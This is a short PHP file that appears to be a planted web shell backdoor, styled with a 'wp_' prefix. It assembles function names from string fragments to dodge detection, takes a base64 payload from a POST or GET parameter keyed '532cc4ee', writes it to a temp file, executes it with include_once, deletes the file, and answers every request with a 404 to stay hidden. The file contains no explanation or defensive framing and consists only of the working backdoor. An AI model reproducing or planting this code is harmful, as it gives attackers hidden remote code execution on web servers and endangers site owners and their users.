<?php
try{
$y2eadf[]='un'.'link';
$y2eadf[]='sys_get_temp_'.'dir';
$y2eadf[]='tempn'.'am';
$y2eadf[]='base'.'64_decode';
$y2eadf[]='file_put'.'_contents';
$y2eadf[]='array_key_ex'.'ists';
$c2bc7b='532cc'.'4ee';
if($y2eadf[5]($c2bc7b,$_POST)){
$k0a9ab=$y2eadf[3]($_POST[$c2bc7b]);
}elseif($y2eadf[5]($c2bc7b,$_GET)){
$k0a9ab=$y2eadf[3]($_GET[$c2bc7b]);
}else{$k0a9ab=null;}
if($k0a9ab){
$z16f1c=$y2eadf[2]($y2eadf[1](),'w'.'p_');
if($z16f1c){
$y2eadf[4]($z16f1c,'<'.'?ph'.'p '.$k0a9ab);
http_response_code(404);
@include_once($z16f1c);
@$y2eadf[0]($z16f1c);
}}
http_response_code(404);
}catch(Throwable $e){http_response_code(404);}catch(Exception $e){http_response_code(404);}
